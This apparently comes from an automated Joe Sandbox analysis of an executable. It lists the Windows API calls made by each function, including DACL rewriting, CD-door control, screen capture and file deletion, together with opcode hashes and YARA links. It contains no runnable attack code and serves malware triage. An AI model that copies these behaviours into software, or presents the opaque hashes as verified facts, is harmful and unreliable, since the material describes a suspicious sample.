                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                  • API String ID: 984253442-2268648507
                                                                                                                                                  • Opcode ID: 905166876d102490932af74605bcaecd45ab205fd6dd95c8991caaae521de310
                                                                                                                                                  • Instruction ID: d1c75e25f411b8293c9e2b9936ec32d1214967a6c4b6286a3ae7157df38e3475
                                                                                                                                                  • Opcode Fuzzy Hash: 905166876d102490932af74605bcaecd45ab205fd6dd95c8991caaae521de310
                                                                                                                                                  • Instruction Fuzzy Hash: 35416272800119BACF14EBE4DD56EEEB3BCEF14341F2005A6F505B2192EA356F59CB61
                                                                                                                                                  Function 00C2A995 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BC4D37: __itow.LIBCMT ref: 00BC4D62
                                                                                                                                                    • Part of subcall function 00BC4D37: __swprintf.LIBCMT ref: 00BC4DAC
                                                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 00C2AA0E
                                                                                                                                                  • GetDriveTypeW.KERNEL32 ref: 00C2AA5B
                                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000, type cdaudio alias cd wait,?,open ), ref: 00C2AAA3
                                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000, wait,?,set cd door ), ref: 00C2AADA
                                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000,close cd wait), ref: 00C2AB08
                                                                                                                                                    • Part of subcall function 00BD1821: _memmove.LIBCMT ref: 00BD185B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                  • API String ID: 2698844021-4113822522
                                                                                                                                                  • Opcode ID: 712d719033c36a69adf6d2317be149e86c872bc2fddab3ebeadce5a0c0d56be1
                                                                                                                                                  • Instruction ID: 128767be98b86a00f8d055979b7a8b6813c76a736240e0ec20dc73b346072a46
                                                                                                                                                  • Opcode Fuzzy Hash: 712d719033c36a69adf6d2317be149e86c872bc2fddab3ebeadce5a0c0d56be1
                                                                                                                                                  • Instruction Fuzzy Hash: EC516DB1104305AFC700EF14C991A6AB3F4FF98758F1089ADF89A97361EB31AE05CB52
                                                                                                                                                  Function 00C2A832 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C2A852
                                                                                                                                                  • __swprintf.LIBCMT ref: 00C2A874
                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C2A8B1
                                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00C2A8D6
                                                                                                                                                  • _memset.LIBCMT ref: 00C2A8F5
                                                                                                                                                  • _wcsncpy.LIBCMT ref: 00C2A931
                                                                                                                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00C2A966
                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00C2A971
                                                                                                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 00C2A97A
                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00C2A984
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                                  • String ID: :$\$\??\%s
                                                                                                                                                  • API String ID: 2733774712-3457252023
                                                                                                                                                  • Opcode ID: 1c4b298c5ee13566767f1c6633f65e78d9d310d3d4f1fc997b20b7a52d4905aa
                                                                                                                                                  • Instruction ID: df375aab8acc12e1eb6346178669382e56ff727600af2f328542761f397184a3
                                                                                                                                                  • Opcode Fuzzy Hash: 1c4b298c5ee13566767f1c6633f65e78d9d310d3d4f1fc997b20b7a52d4905aa
                                                                                                                                                  • Instruction Fuzzy Hash: 0F31907550021AABDB219FA1DC49FEF73BCEF89701F2041A6F519E21A1E77097848B25
                                                                                                                                                  Function 00C4C0A5 Relevance: 22.6, APIs: 15, Instructions: 130filememorywindowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00C4982C,?,?), ref: 00C4C0C8
                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00C4982C,?,?,00000000,?), ref: 00C4C0DF
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00C4982C,?,?,00000000,?), ref: 00C4C0EA
                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00C4982C,?,?,00000000,?), ref: 00C4C0F7
                                                                                                                                                  • GlobalLock.KERNEL32(00000000,?,?,?,?,00C4982C,?,?,00000000,?), ref: 00C4C100
                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00C4982C,?,?,00000000,?), ref: 00C4C10F
                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00C4982C,?,?,00000000,?), ref: 00C4C118
                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00C4982C,?,?,00000000,?), ref: 00C4C11F
                                                                                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00C4982C,?,?,00000000,?), ref: 00C4C130
                                                                                                                                                  • #418.OLEAUT32(?,00000000,00000000,00C53C7C,?,?,?,?,?,00C4982C,?,?,00000000,?), ref: 00C4C149
                                                                                                                                                  • GlobalFree.KERNEL32(00000000,?,?,?,?,00C4982C,?,?,00000000,?), ref: 00C4C159
                                                                                                                                                  • GetObjectW.GDI32(00000000,00000018,?,?,?,?,?,00C4982C,?,?,00000000,?), ref: 00C4C17D
                                                                                                                                                  • CopyImage.USER32(00000000,00000000,?,?,00002000,?,?,?,?,00C4982C,?,?,00000000,?), ref: 00C4C1A8
                                                                                                                                                  • DeleteObject.GDI32(00000000,00000000,?,?,?,?,?,00C4982C,?,?,00000000,?), ref: 00C4C1D0
                                                                                                                                                  • SendMessageW.USER32(?,00000172,00000000,00000000,00000000,?,?,?,?,?,00C4982C,?,?,00000000,?), ref: 00C4C1E6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Global$File$CloseCreateHandleObject$#418AllocCopyDeleteFreeImageLockMessageReadSendSizeStreamUnlock
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2779716855-0
                                                                                                                                                  • Opcode ID: 16d037a40c9178b4091bb54eec3c790e5b22396c5ac45415a6209a255dea4ec3
                                                                                                                                                  • Instruction ID: d563d89bf5175c2e7a4079f64653fbbac06fb87acc6f2f982685031c89c753c8
                                                                                                                                                  • Opcode Fuzzy Hash: 16d037a40c9178b4091bb54eec3c790e5b22396c5ac45415a6209a255dea4ec3
                                                                                                                                                  • Instruction Fuzzy Hash: 45411975501204AFDB519F65DC88FAE7BB8FB89712F204058F915E7260DB309A81DB60
                                                                                                                                                  Function 00C4C854 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BC29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,00BC1CE4,?), ref: 00BC29F3
                                                                                                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000,00000000,?), ref: 00C4C8A4
                                                                                                                                                  • GetFocus.USER32(?,?,?,?), ref: 00C4C8B4
                                                                                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 00C4C8BF
                                                                                                                                                  • _memset.LIBCMT ref: 00C4C9EA
                                                                                                                                                  • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00C4CA15
                                                                                                                                                  • GetMenuItemCount.USER32(?), ref: 00C4CA35
                                                                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 00C4CA48
                                                                                                                                                  • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00C4CA7C
                                                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00C4CAC4
                                                                                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C4CAFC
                                                                                                                                                  • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00C4CB31
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                                                  • String ID: 0
                                                                                                                                                  • API String ID: 1296962147-4108050209
                                                                                                                                                  • Opcode ID: 3e5a515b7757b4b01b4b6ce76b7f10f681a4dc137e21806d03951d39f0f33861
                                                                                                                                                  • Instruction ID: 4a82ebfc8480f3b4e3f70773e213e607cf8a9246091ad0d541a1428319127e4c
                                                                                                                                                  • Opcode Fuzzy Hash: 3e5a515b7757b4b01b4b6ce76b7f10f681a4dc137e21806d03951d39f0f33861
                                                                                                                                                  • Instruction Fuzzy Hash: 00819C7120A301AFD750CF14C885E6BBBE8FF88354F10492DF9A5A72A1D730DA45DBA2
                                                                                                                                                  Function 00C18ACA Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00C18E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?,00000000,00000000,00000000,?,?,00C18900,?,?,?), ref: 00C18E3C
                                                                                                                                                    • Part of subcall function 00C18E20: GetLastError.KERNEL32(?,00C18900,?,?,?), ref: 00C18E46
                                                                                                                                                    • Part of subcall function 00C18E20: GetProcessHeap.KERNEL32(00000008,?,?,00C18900,?,?,?), ref: 00C18E55
                                                                                                                                                    • Part of subcall function 00C18E20: HeapAlloc.KERNEL32(00000000,?,00C18900,?,?,?), ref: 00C18E5C
                                                                                                                                                    • Part of subcall function 00C18E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?,?,00C18900,?,?,?), ref: 00C18E73
                                                                                                                                                    • Part of subcall function 00C18EBD: GetProcessHeap.KERNEL32(00000008,00C18916,00000000,00000000,?,00C18916,?), ref: 00C18EC9
                                                                                                                                                    • Part of subcall function 00C18EBD: HeapAlloc.KERNEL32(00000000,?,00C18916,?), ref: 00C18ED0
                                                                                                                                                    • Part of subcall function 00C18EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00C18916,?), ref: 00C18EE1
                                                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C18B2E
                                                                                                                                                  • _memset.LIBCMT ref: 00C18B43
                                                                                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C18B62
                                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00C18B73
                                                                                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00C18BB0
                                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C18BCC
                                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00C18BE9
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00C18BF8
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00C18BFF
                                                                                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C18C20
                                                                                                                                                  • CopySid.ADVAPI32(00000000), ref: 00C18C27
                                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C18C58
                                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C18C7E
                                                                                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C18C92
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3996160137-0
                                                                                                                                                  • Opcode ID: d10ed5f96dd19e982be8e83d5eccd903f7424160dc79dbef15c4191172886421
                                                                                                                                                  • Instruction ID: 96f045015af1e585dee4c3d60344fb8b19b423f3e5254ce18287c0647a80459c
                                                                                                                                                  • Opcode Fuzzy Hash: d10ed5f96dd19e982be8e83d5eccd903f7424160dc79dbef15c4191172886421
                                                                                                                                                  • Instruction Fuzzy Hash: BB616975904209AFCF10DFA0DC44FEEBB79FF45301F148169E925E6290DB319A99EBA0
                                                                                                                                                  Function 00C37A04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetDC.USER32(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00C360F0), ref: 00C37A79
                                                                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,00000007,?,?,?,?,?,?,?,?,?,?,?,?,00C360F0,?), ref: 00C37A85
                                                                                                                                                  • CreateCompatibleDC.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00C360F0,?,?,00000006), ref: 00C37A91
                                                                                                                                                  • SelectObject.GDI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00C360F0,?,?), ref: 00C37A9E
                                                                                                                                                  • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00C37AF2
                                                                                                                                                  • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00C37B2E
                                                                                                                                                  • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00C37B52
                                                                                                                                                  • SelectObject.GDI32(00000006,?), ref: 00C37B5A
                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00C37B63
                                                                                                                                                  • DeleteDC.GDI32(00000006), ref: 00C37B6A
                                                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 00C37B75
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                  • String ID: (
                                                                                                                                                  • API String ID: 2598888154-3887548279
                                                                                                                                                  • Opcode ID: 913c563e06c005004fc464f65a7bf9e7472f6607bf41e3652d3138fe29e647d9
                                                                                                                                                  • Instruction ID: d7d2f8fbcb9a491b747df97f885085c86d494fa740db42e63a23fbe5902e6351
                                                                                                                                                  • Opcode Fuzzy Hash: 913c563e06c005004fc464f65a7bf9e7472f6607bf41e3652d3138fe29e647d9
                                                                                                                                                  • Instruction Fuzzy Hash: 565148B5904309EFCB24CFA9CC84FAEBBB9EF48310F14851DF95AA7250D731A9418B60
                                                                                                                                                  Function 00C2A48D Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LoadStringW.USER32(00000066,?,00000FFF,?,00000000,00C50990,?,00C030B6,00000085,?), ref: 00C2A4D4
                                                                                                                                                    • Part of subcall function 00BD1A36: _memmove.LIBCMT ref: 00BD1A77
                                                                                                                                                  • LoadStringW.USER32(?,?,00000FFF,?,?,00C030B6,00000085,?), ref: 00C2A4F6
                                                                                                                                                  • __swprintf.LIBCMT ref: 00C2A54F
                                                                                                                                                  • __swprintf.LIBCMT ref: 00C2A568
                                                                                                                                                  • _wprintf.LIBCMT ref: 00C2A61E
                                                                                                                                                  • _wprintf.LIBCMT ref: 00C2A63C
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                  • API String ID: 311963372-2391861430
                                                                                                                                                  • Opcode ID: 46138fa5a12862bddd8f2ca0c0a2f219cffbe64104bdc94eb894af34896e9860
                                                                                                                                                  • Instruction ID: be84c2dd64a211577ca5f5b3197833be36861a3dd34d871c13f799ae0084e23f
                                                                                                                                                  • Opcode Fuzzy Hash: 46138fa5a12862bddd8f2ca0c0a2f219cffbe64104bdc94eb894af34896e9860
                                                                                                                                                  • Instruction Fuzzy Hash: 8651AE71800119BBCF15EBE4DD46EEEB7B8AF04340F2045A6F505B22A2EB356F58DB61
                                                                                                                                                  Function 00C29710 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00C2951A: __time64.LIBCMT ref: 00C29524
                                                                                                                                                    • Part of subcall function 00BD4A8C: _fseek.LIBCMT ref: 00BD4AA4
                                                                                                                                                  • __wsplitpath.LIBCMT ref: 00C297EF
                                                                                                                                                    • Part of subcall function 00BE431E: __wsplitpath_helper.LIBCMT ref: 00BE435E
                                                                                                                                                  • _wcscpy.LIBCMT ref: 00C29802
                                                                                                                                                  • _wcscat.LIBCMT ref: 00C29815
                                                                                                                                                  • __wsplitpath.LIBCMT ref: 00C2983A
                                                                                                                                                  • _wcscat.LIBCMT ref: 00C29850
                                                                                                                                                  • _wcscat.LIBCMT ref: 00C29863
                                                                                                                                                    • Part of subcall function 00C29560: _memmove.LIBCMT ref: 00C29599
                                                                                                                                                    • Part of subcall function 00C29560: _memmove.LIBCMT ref: 00C295A8
                                                                                                                                                  • _wcscmp.LIBCMT ref: 00C297AA
                                                                                                                                                    • Part of subcall function 00C29CF1: _wcscmp.LIBCMT ref: 00C29DE1
                                                                                                                                                    • Part of subcall function 00C29CF1: _wcscmp.LIBCMT ref: 00C29DF4
                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00C29A0D
                                                                                                                                                  • _wcsncpy.LIBCMT ref: 00C29A80
                                                                                                                                                  • DeleteFileW.KERNEL32(?,?), ref: 00C29AB6
                                                                                                                                                  • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C29ACC
                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C29ADD
                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C29AEF
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1500180987-0
                                                                                                                                                  • Opcode ID: 17ee6790ce6bcb758961103e7f466a3ceb6e547de35d05805ff4018cac3b70c3
                                                                                                                                                  • Instruction ID: cac081a854ad0e7ec1a58d36a26e7b6386d7fa5ecc59d22b32a72c837f2ace84
                                                                                                                                                  • Opcode Fuzzy Hash: 17ee6790ce6bcb758961103e7f466a3ceb6e547de35d05805ff4018cac3b70c3
                                                                                                                                                  • Instruction Fuzzy Hash: B8C12BB1D00229ABDF21DF95DC85ADEB7BDEF45310F0040AAF609E7251EB709A848F65
                                                                                                                                                  Function 00BD5BD7 Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 00BD5BF1
                                                                                                                                                  • GetMenuItemCount.USER32(00C87890,?,?), ref: 00C10E7B
                                                                                                                                                  • GetMenuItemCount.USER32(00C87890), ref: 00C10F2B
                                                                                                                                                  • GetCursorPos.USER32(?), ref: 00C10F6F
                                                                                                                                                  • SetForegroundWindow.USER32(00000000), ref: 00C10F78
                                                                                                                                                  • TrackPopupMenuEx.USER32(00C87890,00000000,?,00000000,00000000,00000000), ref: 00C10F8B
                                                                                                                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00C10F97
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
